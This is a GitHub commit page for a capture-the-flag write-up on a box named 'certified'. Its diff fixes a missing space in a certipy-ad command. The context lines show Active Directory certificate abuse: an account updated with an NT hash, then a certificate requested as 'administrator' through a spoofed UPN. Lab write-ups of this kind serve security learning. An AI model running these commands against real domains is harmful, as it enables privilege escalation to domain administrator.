Skip to content

Commit

Permalink
fix
Browse files Browse the repository at this point in the history
  • Loading branch information
farukerdem34 committed Jan 15, 2025
1 parent ca6f348 commit 887005f
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion content/CTF Write-Ups/certified.md
Original file line number Diff line number Diff line change
Expand Up @@ -456,7 +456,7 @@ certipy-ad account update -u [email protected] -hashes $NT_HASH -user
Then request certificate of `administrator`
```bash
certipy-ad req -u [email protected] -p $new_password -ca certified-DC01-CA -template CertifiedAuthentication -upn administrator -debug -dc-ip $target_ip-ns $target_ip
certipy-ad req -u [email protected] -p $new_password -ca certified-DC01-CA -template CertifiedAuthentication -upn administrator -debug -dc-ip $target_ip -ns $target_ip
```
After requestes `administrator.pfx` change the principal of `ca_operator` to original
Expand Down

0 comments on commit 887005f

Please sign in to comment.